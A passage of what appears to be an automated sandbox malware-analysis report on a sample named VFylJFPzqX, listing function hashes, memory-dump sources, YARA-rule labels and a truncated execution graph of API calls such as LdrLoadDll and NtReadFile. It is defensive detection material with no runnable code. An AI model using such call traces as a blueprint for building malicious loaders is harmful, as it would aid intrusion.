                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe636eb12f80cdd0ce584933fad0e86d0c64050e6610e96b0b4cfe8fb434d67a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1361D574E05209DFCB04CFAAD5819EEFBF2FF89210F24A52AD455B7214D7349A418F64
                                                                                                                                                                                                                                        Function 05E781C0 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 17c349f48a03c11362109ada00fabd04a962094073187c361916877c5865be7d
                                                                                                                                                                                                                                        • Instruction ID: 1eed4c05f7df75b5f9c3312e8a3f50f4de7e0868a6a0c6009a7b61b8ffa11747
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17c349f48a03c11362109ada00fabd04a962094073187c361916877c5865be7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB611870E0960EDBDB08CFA5D5485EEFBB2FF99301F20A42AD805B7254E7349A41CB61
                                                                                                                                                                                                                                        Function 073C7BE9 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9399f7e80cc33b7b4c9aa17114afc97f516f986776e0161cf88bd49124bc221e
                                                                                                                                                                                                                                        • Instruction ID: 79af048c2561ff48903238fa56afc07f42e423816f5f72b2ec392ff54a6e8617
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9399f7e80cc33b7b4c9aa17114afc97f516f986776e0161cf88bd49124bc221e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1871E5B1E10629CBDB14DF65C9417DEB7B2BF8A300F1085AAC849B7250EB345A85CF51
                                                                                                                                                                                                                                        Function 05E781B3 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1aff815e909af6207dd72549f52c792b1c4e70b72f5ca55ffd7edab07f643199
                                                                                                                                                                                                                                        • Instruction ID: b94938546c7de061a74745411d935033840b3596ebfda6788d0c2780042b50a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1aff815e909af6207dd72549f52c792b1c4e70b72f5ca55ffd7edab07f643199
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D613770E0960ADFCB08CFA5D5445EEFBB2FF99301F24A42AD805B7254E7348A41CBA1
                                                                                                                                                                                                                                        Function 0A218108 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e0e617d346f33f3df9c4dd3088fa43e386b9657c5aed661825afd3a4245ccfaa
                                                                                                                                                                                                                                        • Instruction ID: 6c2e7e0f2bc5667ad076e71abae6bc3ea90d2e59fcd7045187b68800fad26318
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0e617d346f33f3df9c4dd3088fa43e386b9657c5aed661825afd3a4245ccfaa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C71F574E112299FDB54DF69D980AAEFBF2FF89200F1481A9D848A7315DB309E41CF61
                                                                                                                                                                                                                                        Function 05E7C615 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fb6e333a7c031741b8e5d36e529a8ccd6d3c73536477d06c6c57e624aa81c18f
                                                                                                                                                                                                                                        • Instruction ID: 8608970c4dbd827eb42c8b95ffe727daf79e1259b9fad630346caaeb124b48eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb6e333a7c031741b8e5d36e529a8ccd6d3c73536477d06c6c57e624aa81c18f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62414A71E1421ECFDB04CFE5D9449DDBBB6FB89311F24A526C04AB7258E7389D418B18
                                                                                                                                                                                                                                        Function 05E7F3F0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 15a1ffe34de6d63e36f606c6aacb155914518e22a6db6218c99bdcee46b30859
                                                                                                                                                                                                                                        • Instruction ID: 52734dffdeacc9d3fba2d3b6a6d3124ab0d08b02efb006a1e58323a7f860907b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a1ffe34de6d63e36f606c6aacb155914518e22a6db6218c99bdcee46b30859
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F512870E0520ADFCB04CFA9C5814EEFBF2FF89350F24956AD565B7254E2309A42CBA1
                                                                                                                                                                                                                                        Function 05E7C600 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7dcec711d99dd953819d41027219f75d7ef9061292f5b4feba2d61a29dbd5054
                                                                                                                                                                                                                                        • Instruction ID: 3ad08a3b634824cf59374a6e2d8816a6fa5ab20427adffbd5ea17564ec0e4cc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dcec711d99dd953819d41027219f75d7ef9061292f5b4feba2d61a29dbd5054
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A414A71E1421ECFDB04CFE5D9449DDBBB6FB89311F20A526C04AB7258E7389D018B18
                                                                                                                                                                                                                                        Function 0A214470 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f1c590b215058c101692254bdf9a0ef3d44bc8fe844d0ee83bbfaa94fd1839d7
                                                                                                                                                                                                                                        • Instruction ID: faae1ff4181f95ab96033d13a8eac69cd79b1e37017864ce360a3f88496751ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c590b215058c101692254bdf9a0ef3d44bc8fe844d0ee83bbfaa94fd1839d7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6351D7B4E11619DFDB58DF6AD884B9EBBF6BF88310F1081A9D409A7264DB309E41CF50
                                                                                                                                                                                                                                        Function 05E7F400 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1551320a64912acc15d13346035f18ad7d35947a67e31af25749f32279bbf924
                                                                                                                                                                                                                                        • Instruction ID: 2bab486afa5916f33b8c84d2b219bee6e3bce07db783a36d056a880d150991c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1551320a64912acc15d13346035f18ad7d35947a67e31af25749f32279bbf924
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE51E9B0E0520ADBCB04CFA9C5815EEFBF2FF88310F24956AD565B7214E7309A418B95
                                                                                                                                                                                                                                        Function 05E7C6B9 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 081dc1017f23b6816a1da6c977b84c8b88d3692ec0121b201ef017bc5be53fcd
                                                                                                                                                                                                                                        • Instruction ID: d3147c960fc58b506dccce14a33a67357ab84f4202b0bb387bd5f56ad64d3a13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 081dc1017f23b6816a1da6c977b84c8b88d3692ec0121b201ef017bc5be53fcd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B313A75E1821ECBDB04CFE5D9446DDBBB6FB88311F20A526C04AAB258E7389D058B19
                                                                                                                                                                                                                                        Function 05E7C6A4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bc70f97b65c2a675e48e60cc7b32f7dfee8b3fe888c3f6372d49515f052a4fe4
                                                                                                                                                                                                                                        • Instruction ID: 15706f8796888b9fbb6ef414273c2c27342fa25b5e447274d4455811597e1371
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc70f97b65c2a675e48e60cc7b32f7dfee8b3fe888c3f6372d49515f052a4fe4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B315B75E1821ECFDF04CFE5D9445DDBBB6FB88311F20A526C04AAB258E7389D018B18
                                                                                                                                                                                                                                        Function 05E77660 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8a028fd7f14ddab021f8d51b2dba57524cff0eb8cb52aa885a97131545510bf4
                                                                                                                                                                                                                                        • Instruction ID: 690da1df0a26790fa9643490961159ff9318ee82cb42e9492bfa58c6df956492
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a028fd7f14ddab021f8d51b2dba57524cff0eb8cb52aa885a97131545510bf4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1621C071E056588BEB19CF6B880179DFBF3AFC9200F14C0BAC448A7265EB750A468F51
                                                                                                                                                                                                                                        Function 073C5B18 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bb2935e882ac735b63e7107dc7be015dd17cfa2a06950e216dd5ff80298fb2e6
                                                                                                                                                                                                                                        • Instruction ID: 567386ccbf991b3af6c5c94b9e47c0999b54e1c1ae5e9fce9a2c3d15bc2e2671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb2935e882ac735b63e7107dc7be015dd17cfa2a06950e216dd5ff80298fb2e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A52110B1E016198BEB2CCF678841699FBF3AFC9300F14C0BAC40DA6214EA7459528F50
                                                                                                                                                                                                                                        Function 05E77670 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 73f68b9ae5b0ed790188f45e261b19bcde68ab1500f8c7deefe2fb213816f9a2
                                                                                                                                                                                                                                        • Instruction ID: b4224635c18e6f8defe25c169d329446a3e417c25c8c4e7cd9134a2268d0ce66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73f68b9ae5b0ed790188f45e261b19bcde68ab1500f8c7deefe2fb213816f9a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF2188B1E006188BEB18CFABC94179EFAF7AFC8304F14C07AC518A7254EB750A469F50
                                                                                                                                                                                                                                        Function 0A213788 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0d8fa3062826e5f16b3958191e63e756586c4e89852dd43ef8806a4392936256
                                                                                                                                                                                                                                        • Instruction ID: d8ed62a11fbcdc81a4ba4ef179512045e100618b965fcc869370aee80aa079ca
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d8fa3062826e5f16b3958191e63e756586c4e89852dd43ef8806a4392936256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4121F771E216199BEB58CFABD9406DEFBF7EFC8210F14C03AD408A7214EB705A028B51
                                                                                                                                                                                                                                        Function 073C5B28 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a54b24e2ee1589ae0eb2e48178932a19e2d17a6c034c5000e73e6a99c3b56701
                                                                                                                                                                                                                                        • Instruction ID: 7336faf129b17eebf07655328b074c21158a37ac76a67c9c899b5cf820fc3ea9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a54b24e2ee1589ae0eb2e48178932a19e2d17a6c034c5000e73e6a99c3b56701
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D221AFB1E016598BEB28CF6BD8417DEFAF7AFC8310F14C0BA950DA6214DB7059968F50
                                                                                                                                                                                                                                        Function 05A2FA30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000005), ref: 05A2FA8E
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000006), ref: 05A2FAC8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                                                                                        • String ID: W
                                                                                                                                                                                                                                        • API String ID: 4116985748-655174618
                                                                                                                                                                                                                                        • Opcode ID: 3087c7ec05953e4f44769e71b5ff8694fa3ad1f844e7fc54e6d407c330bc0642
                                                                                                                                                                                                                                        • Instruction ID: 477e8823bf507daef6e13e873d3cb7dfba45644e45d2d26c597f978d4b84d578
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3087c7ec05953e4f44769e71b5ff8694fa3ad1f844e7fc54e6d407c330bc0642
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 592175B0C0434A8FDB10CF9AD44979EFFF0AF48314F24885AE458A7290D3785948CFA5

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:1.4%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                                        Signature Coverage:6%
                                                                                                                                                                                                                                        Total number of Nodes:549
                                                                                                                                                                                                                                        Total number of Limit Nodes:68
                                                                                                                                                                                                                                        execution_graph 96964 1802ad0 LdrInitializeThunk 96968 41f170 96969 41f17b 96968->96969 96971 41b940 96968->96971 96972 41b966 96971->96972 96979 409d40 96972->96979 96974 41b972 96975 41b993 96974->96975 96987 40c1c0 96974->96987 96975->96969 96977 41b985 97023 41a680 96977->97023 97026 409c90 96979->97026 96981 409d4d 96982 409d54 96981->96982 97038 409c30 96981->97038 96982->96974 96988 40c1e5 96987->96988 97448 40b1c0 96988->97448 96990 40c23c 97452 40ae40 96990->97452 96992 40c4b3 96992->96977 96993 40c262 96993->96992 97461 4143a0 96993->97461 96995 40c2a7 96995->96992 97464 408a60 96995->97464 96997 40c2eb 96997->96992 97471 41a4d0 96997->97471 97001 40c341 97002 40c348 97001->97002 97483 419fe0 97001->97483 97003 41bd90 2 API calls 97002->97003 97006 40c355 97003->97006 97006->96977 97007 40c392 97008 41bd90 2 API calls 97007->97008 97009 40c399 97008->97009 97009->96977 97010 40c3a2 97011 40f4a0 3 API calls 97010->97011 97012 40c416 97011->97012 97012->97002 97013 40c421 97012->97013 97014 41bd90 2 API calls 97013->97014 97015 40c445 97014->97015 97488 41a030 97015->97488 97018 419fe0 2 API calls 97019 40c480 97018->97019 97019->96992 97493 419df0 97019->97493 97022 41a680 2 API calls 97022->96992 97024 41af30 LdrLoadDll 97023->97024 97025 41a69f ExitProcess 97024->97025 97025->96975 97027 409ca3 97026->97027 97077 418b90 LdrLoadDll 97026->97077 97057 418a40 97027->97057 97030 409cac 97031 409cb6 97030->97031 97060 41b280 97030->97060 97031->96981 97033 409cf3 97033->97031 97071 409ab0 97033->97071 97035 409d13 97078 409620 LdrLoadDll 97035->97078 97037 409d25 97037->96981 97039 409c4a 97038->97039 97040 41b570 LdrLoadDll 97038->97040 97422 41b570 97039->97422 97040->97039 97043 41b570 LdrLoadDll 97044 409c71 97043->97044 97045 40f180 97044->97045 97046 40f199 97045->97046 97431 40b040 97046->97431 97048 40f1ac 97435 41a1b0 97048->97435 97052 40f1d2 97055 40f1fd 97052->97055 97441 41a230 97052->97441 97054 41a460 2 API calls 97056 409d65 97054->97056 97055->97054 97056->96974 97079 41a5d0 97057->97079 97061 41b299 97060->97061 97092 414a50 97061->97092 97063 41b2b1 97064 41b2ba 97063->97064 97131 41b0c0 97063->97131 97064->97033 97066 41b2ce 97066->97064 97149 419ed0 97066->97149 97074 409aca 97071->97074 97400 407ea0 97071->97400 97073 409ad1 97073->97035 97074->97073 97413 408160 97074->97413 97077->97027 97078->97037 97080 418a55 97079->97080 97082 41af30 97079->97082 97080->97030 97083 41af40 97082->97083 97085 41af62 97082->97085 97086 414e50 97083->97086 97085->97080 97087 414e5e 97086->97087 97088 414e6a 97086->97088 97087->97088 97091 4152d0 LdrLoadDll 97087->97091 97088->97085 97090 414fbc 97090->97085 97091->97090 97093 414d85 97092->97093 97103 414a64 97092->97103 97093->97063 97096 414b90 97161 41a330 97096->97161 97097 414b73 97218 41a430 LdrLoadDll 97097->97218 97100 414bb7 97102 41bd90 2 API calls 97100->97102 97101 414b7d 97101->97063 97105 414bc3 97102->97105 97103->97093 97158 419c20 97103->97158 97104 414d49 97107 41a460 2 API calls 97104->97107 97105->97101 97105->97104 97106 414d5f 97105->97106 97111 414c52 97105->97111 97227 414790 LdrLoadDll NtReadFile NtClose 97106->97227 97109 414d50 97107->97109 97109->97063 97110 414d72 97110->97063 97112 414cb9 97111->97112 97114 414c61 97111->97114 97112->97104 97113 414ccc 97112->97113 97220 41a2b0 97113->97220 97116 414c66 97114->97116 97117 414c7a 97114->97117 97219 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97116->97219 97120 414c97 97117->97120 97121 414c7f 97117->97121 97120->97109 97176 414410 97120->97176 97164 4146f0 97121->97164 97123 414c70 97123->97063 97125 414d2c 97224 41a460 97125->97224 97126 414c8d 97126->97063 97128 414caf 97128->97063 97130 414d38 97130->97063 97132 41b0d1 97131->97132 97133 41b0e3 97132->97133 97245 41bd10 97132->97245 97133->97066 97135 41b104 97248 414070 97135->97248 97137 41b150 97137->97066 97138 41b127 97138->97137 97139 414070 3 API calls 97138->97139 97141 41b149 97139->97141 97141->97137 97273 415390 97141->97273 97142 41b1da 97144 41b1ea 97142->97144 97367 41aed0 LdrLoadDll 97142->97367 97283 41ad40 97144->97283 97146 41b218 97362 419e90 97146->97362 97150 419edf 97149->97150 97151 41af30 LdrLoadDll 97150->97151 97152 419eec 97151->97152 97394 1802c0a 97152->97394 97153 419f07 97155 41bd90 97153->97155 97156 41b329 97155->97156 97397 41a640 97155->97397 97156->97033 97159 414b44 97158->97159 97160 41af30 LdrLoadDll 97158->97160 97159->97096 97159->97097 97159->97101 97160->97159 97162 41a34c NtCreateFile 97161->97162 97163 41af30 LdrLoadDll 97161->97163 97162->97100 97163->97162 97165 41470c 97164->97165 97166 41a2b0 LdrLoadDll 97165->97166 97167 41472d 97166->97167 97168 414734 97167->97168 97169 414748 97167->97169 97170 41a460 2 API calls 97168->97170 97171 41a460 2 API calls 97169->97171 97172 41473d 97170->97172 97173 414751 97171->97173 97172->97126 97228 41bfa0 LdrLoadDll RtlAllocateHeap 97173->97228 97175 41475c 97175->97126 97177 41445b 97176->97177 97178 41448e 97176->97178 97179 41a2b0 LdrLoadDll 97177->97179 97180 4145d9 97178->97180 97184 4144aa 97178->97184 97181 414476 97179->97181 97182 41a2b0 LdrLoadDll 97180->97182 97183 41a460 2 API calls 97181->97183 97188 4145f4 97182->97188 97185 41447f 97183->97185 97186 41a2b0 LdrLoadDll 97184->97186 97185->97128 97187 4144c5 97186->97187 97190 4144e1 97187->97190 97191 4144cc 97187->97191 97241 41a2f0 LdrLoadDll 97188->97241 97194 4144e6 97190->97194 97195 4144fc 97190->97195 97193 41a460 2 API calls 97191->97193 97192 41462e 97197 41a460 2 API calls 97192->97197 97198 4144d5 97193->97198 97196 41a460 2 API calls 97194->97196 97203 414501 97195->97203 97229 41bf60 97195->97229 97199 4144ef 97196->97199 97200 414639 97197->97200 97198->97128 97199->97128 97200->97128 97211 414513 97203->97211 97232 41a3e0 97203->97232 97204 414567 97205 41457e 97204->97205 97240 41a270 LdrLoadDll 97204->97240 97207 414585 97205->97207 97208 41459a 97205->97208 97209 41a460 2 API calls 97207->97209 97210 41a460 2 API calls 97208->97210 97209->97211 97212 4145a3 97210->97212 97211->97128 97213 4145cf 97212->97213 97235 41bb60 97212->97235 97213->97128 97215 4145ba 97216 41bd90 2 API calls 97215->97216 97217 4145c3 97216->97217 97217->97128 97218->97101 97219->97123 97221 41af30 LdrLoadDll 97220->97221 97222 414d14 97221->97222 97223 41a2f0 LdrLoadDll 97222->97223 97223->97125 97225 41a47c NtClose 97224->97225 97226 41af30 LdrLoadDll 97224->97226 97225->97130 97226->97225 97227->97110 97228->97175 97230 41bf78 97229->97230 97242 41a600 97229->97242 97230->97203 97233 41a3fc NtReadFile 97232->97233 97234 41af30 LdrLoadDll 97232->97234 97233->97204 97234->97233 97236 41bb84 97235->97236 97237 41bb6d 97235->97237 97236->97215 97237->97236 97238 41bf60 2 API calls 97237->97238 97239 41bb9b 97238->97239 97239->97215 97240->97205 97241->97192 97243 41af30 LdrLoadDll 97242->97243 97244 41a61c RtlAllocateHeap 97243->97244 97244->97230 97246 41bd3d 97245->97246 97368 41a510 97245->97368 97246->97135 97249 414081 97248->97249 97250 414089 97248->97250 97249->97138 97272 41435c 97250->97272 97371 41cf00 97250->97371 97252 4140dd 97253 41cf00 2 API calls 97252->97253 97256 4140e8 97253->97256 97254 414136 97257 41cf00 2 API calls 97254->97257 97256->97254 97376 41cfa0 97256->97376 97258 41414a 97257->97258 97259 41cf00 2 API calls 97258->97259 97261 4141bd 97259->97261 97260 